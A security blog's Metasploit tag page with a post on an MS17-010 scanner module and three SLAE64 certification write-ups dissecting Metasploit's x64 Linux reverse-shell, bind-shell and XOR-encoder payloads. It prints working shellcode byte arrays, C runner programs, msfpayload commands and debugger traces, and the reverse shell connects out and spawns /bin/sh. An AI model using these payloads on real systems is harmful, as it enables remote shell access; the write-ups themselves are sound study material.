Showing posts with label metasploit. Show all posts
Showing posts with label metasploit. Show all posts

Tuesday, April 18, 2017

MS17-010 (SMB RCE) Metasploit Scanner Detection Module

Update April 21, 2017 - There is an active pull request at Metasploit master which adds DoublePulsar infection detection to this module.

During the first Shadow Brokers leak, my colleagues at RiskSense and I reverse engineered and improved the EXTRABACON exploit, which I wrote a feature about for PenTest Magazine. Last Friday, Shadow Brokers leaked FuzzBunch, a Metasploit-like attack framework that hosts a number of Windows exploits not previously seen. Microsoft's official response says these exploits were fixed up in MS17-010, released in mid-March.

Yet again I find myself tangled up in the latest Shadow Brokers leak. I actually wrote a scanner to detect MS17-010 about 2-3 weeks prior to the leak, judging by the date on my initial pull request to Metasploit master. William Vu, of Rapid7 (and whom coincidentally I met in person the day of the leak), added some improvements as well. It was pulled into the master branch on the day of the leak. This module can be used to scan a network range (RHOSTS) and detect if the patch is missing or not.

Module Information Page
https://rapid7.com/db/modules/auxiliary/scanner/smb/smb_ms17_010

Module Source Code
https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb

My scanner module connects to the IPC$ tree and attempts a PeekNamedPipe transaction on FID 0. If the status returned is "STATUS_INSUFF_SERVER_RESOURCES", the machine does not have the MS17-010 patch. After the patch, Win10 returns "STATUS_ACCESS_DENIED" and other Windows versions "STATUS_INVALID_HANDLE". In case none of these are detected, the module says it was not able to detect the patch level (I haven't seen this in practice).

IPC$ is the "InterProcess Communication" share, which generally does not require valid SMB credentials in default server configurations. Thus this module can usually be done as an unauthed scan, as it can log on as the user "\" and connect to IPC$.

This is the most important patch for Windows in almost a decade, as it fixes several remote vulnerabilities for which there are now public exploits (EternalBlue, EternalRomance, and EternalSynergy).

These are highly complex exploits, but the FuzzBunch framework essentially makes the process as easy as point and shoot. EternalRomance does a ridiculous amount of "grooming", aka remote heap feng shui. In the case of EternalBlue, it spawns numerous threads and simultaneously exploits SMBv1 and SMBv2, and seems to talk Cairo, an undocumented SMB LanMan alternative (only known because of the NT4 source code leaks). I haven't gotten around to looking at EternalSynergy yet.

I am curious to learn more, but have too many side projects at the moment to spend my full efforts investigating further. And unlike EXTRABACON, I don't see any "obvious" improvements other than I would like to see an open source version.

Saturday, December 20, 2014

A Look at the linux/x64/shell_reverse_tcp Metasploit Payload

After I finished micro optimizing my reverse TCP port shellcode, I remembered that Metasploit offers one. The msfpayload generated one which weighs in at 74 bytes. My payload is 77 bytes, however mine doesn't contain any null-bytes. Metasploit's will always contain nulls, even if your IP and port do not.

Even though I was sad to see it contained null-byutes, I thought there might be something to learn from Metasploit's version.

root@kali:~/# msfpayload linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 C
 * linux/x64/shell_reverse_tcp - 74 bytes

I threw this into a C file.

unsigned char sc[] = 
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48"
"\xb9\x02\x00\x11\x5c\x7f\x00\x00\x01\x51\x48\x89\xe6\x6a\x10"
"\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58"
"\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f"
"\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05";

main(void)
{
    (*(void(*)()) sc)();
}


I compiled it: gcc -m64 -z execstack msfreverse.c

I then started up: gdb ./a.out

0x00000000004004ba in main ()
7: /x $rdi = 0x1
6: /x $rsi = 0x7fffffffe428
5: /x $rdx = 0x600880
4: /x $rcx = 0x0
3: /x $rbx = 0x0
2: /x $rax = 0x0
1: x/i $rip
=> 0x4004ba <main+14>:    callq  *%rdx

Again as I saw in the bind shell version, I discovered they were able to shrink their register fixing and first syscall into 12 bytes, whereas mine was 13.  Here again is a high level look at what they did to accomplish this:

push   0x29
pop    rax
cdq
push   0x2
pop    rdi
push   0x1
pop    rsi
syscall

Next we come across an area with null-bytes. Since I used 127.0.0.1 for the address, there are null-bytes. I got around this in my own shellcode by subtracting a mask, and adding it back when the shellcode is run.

One thing they did that was able to shrink the code considerably is enter all of the struct sockaddr in a single mov instruction.

0x000000000060088e in sc ()
7: /x $rdi = 0x7
6: /x $rsi = 0x1
5: /x $rdx = 0x0
4: /x $rcx = 0xffffffffffffffff
3: /x $rbx = 0x0
2: /x $rax = 0x2
1: x/i $rip
=> 0x60088e <sc+14>:    movabs $0x100007f5c110002,%rcx

It looks like they actually end up with some pollution in their stack when the syscall is made.

(gdb) x/4xw $rsi
0x7fffffffe330:    0x5c110002    0x0100007f    0x004004bc    0x00000000

We can compare this to  my version, which cleans the stack first.
(gdb) x/4xw $rsi
0x7fffffffe328:    0x5c110002    0x0100007f    0x00000000    0x00000000

I ran both programs through strace, and got identical syscalls.

connect(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("127.0.0.1")}, 16)

So I consulted the man page. It would appear these are optional bytes, and there may be a way to shrink my own shellcode at this point. I think I would be able to save 1 byte by not pushing and clearing this out.

The rest of the code is pretty standard for a reverse shell.  There's another null-byte when the "/bin/sh" string is put on the stack.

So just by looking at Metasploit's code I found at least two places I can further shrink my own code.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.

Student ID: SLAE64 - 1360

A Look at the linux/x64/shell_bind_tcp Metasploit Payload

After I finished micro optimizing my bind TCP port shellcode, I remembered that Metasploit offers one. The msfpayload generated one which weighs in at 86 bytes and the payload always contains null-bytes, even if your port does not have one.  Even though the version I created already had 81 bytes, I thought there might be something to learn from Metasploit's version.

root@kali:~/# msfpayload linux/x64/shell_bind_tcp RPORT=4444 C
 * linux/x64/shell_bind_tcp - 86 bytes

I threw this into a C file.

unsigned char sc[] =
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x52"
"\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x6a\x10\x5a\x6a\x31">
"\x58\x0f\x05\x6a\x32\x58\x0f\x05\x48\x31\xf6\x6a\x2b\x58\x0f"
"\x05\x48\x97\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75"
"\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00"
"\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05";

main(void)
{
    (*(void(*)()) sc)();
}


I compiled it: gcc -m64 -z execstack msfbind.c

I then started up: gdb ./a.out

0x00000000004004ba in main ()
7: /x $rdi = 0x1
6: /x $rsi = 0x7fffffffe428
5: /x $rdx = 0x600880
4: /x $rcx = 0x0
3: /x $rbx = 0x0
2: /x $rax = 0x0
1: x/i $rip
=> 0x4004ba <main+14>:    callq  *%rdx

I discovered they were able to shrink their register fixing and first syscall into 12 bytes, whereas mine was 13.  Here is a high level look at what they did to accomplish this:

push   0x29
pop    rax
cdq
push   0x2
pop    rdi
push   0x1
pop    rsi
syscall

You can compare that with my version, which uses the xor esi, esi and mul esi to clear 3 registers.  Here the same is done with cdq to clear out the pollution, and then qword pushes popped directly into the registers. In a future release of my own shellcode I would make this change.

Next though, we come across one of the first instances of a null-byte.  It is part of the struct sock_addr that is used, where the port and address family is specified.

0x000000000060088f in sc ()
7: /x $rdi = 0x7
6: /x $rsi = 0x1
5: /x $rdx = 0x0
4: /x $rcx = 0xffffffffffffffff
3: /x $rbx = 0x0
2: /x $rax = 0x2
1: x/i $rip
=> 0x60088f <sc+15>:    movl   $0x5c110002,(%rsp)

When I was writing my own shellcode, I had to make a sacrifice. I probably could have shrunk even more bytes if I didn't make the PORT configurable.  However, doing so may be the reason I went about things differently, and 0'd out that area of the struct by pushing a 0 register twice. This is definitely less bytes, but of course has the null.

The next parts of this shellcode are all pretty standard.  I didn't see too much more I could do in terms of shrinkage, and my own execution was very similar to this payload's.

I did want to point out another area though where the null-byte is used, as the terminator for the "/bin/sh" string. I got around this by first pushing a 0 register on the stack, and then naming the string "//bin/sh" to fill in the extra byte.

(gdb) x/i $rip
=> 0x6008c1 <sc+65>:    movabs $0x68732f6e69622f,%rbx
(gdb) x/3x $rip
0x6008c1 <sc+65>:    0x622fbb48    0x732f6e69    0x48530068
(gdb) .

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.

Student ID: SLAE64 - 1360

A Look at the x64/xor Metasploit Encoder

After I finished micro optimizing my reverse TCP shellcode, I remembered that Metasploit offers one. The msfpayload generated one which weighs in at 74 bytes. It would seem better than my 77 byte shellcode, except this comes with a price. The payload always contains null-bytes, even if your IP does not have .0's in it. This means you won't have as much luck exploiting string buffers as a completely null-free version would.

I found that to generate a null-free reverse TCP payload with Metasploit I had to use the encoder, and there only appears to be a single encoder explicitly for x64. The final payload size is 119 bytes.

root@kali:~/.ssh# msfpayload linux/x64/shell_reverse_tcp LHOST=10.2.100.15 LPORT=4444 R | msfencode -t c -e x64/xor -b '\x00'
[*] x64/xor succeeded with size 119 (iteration=1)

I threw this into a C file.

unsigned char sc[] =
"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\x64\x8b\x0a\x55\x36\x0b\x54\xa5\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x0e\xa2\x52\xcc\x5c\x09"
"\x0b\xcf\x65\xd5\x05\x50\x7e\x9c\x1c\x1c\x66\x8b\x1b\x09\x3c"
"\x09\x30\xaa\x35\xc3\x83\xb3\x5c\x1b\x0e\xcf\x4e\xd3\x05\x50"
"\x5c\x08\x0a\xed\x9b\x45\x60\x74\x6e\x04\x51\xd0\x92\xe1\x31"
"\x0d\xaf\x43\xef\x8a\x06\xe2\x64\x7a\x45\x63\x54\xf6\x2c\x02"
"\xed\x07\x61\x43\xdd\x43\x6b\x8e\x0a\x55\x36\x0b\x54\xa5";

main(void)
{
    (*(void(*)()) sc)();
}


I compiled it: gcc -m64 -z execstack msfencoded.c

I then started up: gdb ./a.out

0x00000000004004ba in main ()
7: /x $rdi = 0x1
6: /x $rsi = 0x7fffffffe428
5: /x $rdx = 0x600880
4: /x $rcx = 0x0
3: /x $rbx = 0x0
2: /x $rax = 0x0
1: x/i $rip
=> 0x4004ba <main+14>:    callq  *%rdx

This is where the call into our shellcode begins. It starts out by setting RCX to 0xa. It then does RIP-relative addressing to load into RAX where it needs to start decoding from.

0x000000000060088a in sc ()
7: /x $rdi = 0x1
6: /x $rsi = 0x7fffffffe428
5: /x $rdx = 0x600880
4: /x $rcx = 0xa
3: /x $rbx = 0x0
2: /x $rax = 0x0
1: x/i $rip
=> 0x60088a <sc+10>:    lea    -0x11(%rip),%rax        # 0x600880 <sc>

Next, 0xa5540b36550a8b64 is moved into RBX. This is xored at [RAX + 0x27].

0x000000000060089b in sc ()
7: /x $rdi = 0x1
6: /x $rsi = 0x7fffffffe428
5: /x $rdx = 0x600880
4: /x $rcx = 0xa
3: /x $rbx = 0xa5540b36550a8b64
2: /x $rax = 0x600880
1: x/i $rip
=> 0x60089b <sc+27>:    xor    %rbx,0x27(%rax)

Eight bytes are then subtracted from RAX and the loop starts back at the XOR continues.  Once the loop finishes, we find ourselves directly at the pre-encoded payload.

This is clearly a very simple encoder.  Here's what the full code looks like:

_start:
    xor rcx, rcx
    sub rcx, 0xfffffffffffffff6
    lea rax, [rip + 0xffffffffffffffef] 
    mova rbx ,0xa5540b36550a8b64

decode:
    xor qword ptr [rax+0x27], rbx
    sub rax, 0xfffffffffffffff8
    loop decode

data:
    db 0x...

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.

Student ID: SLAE64 - 1360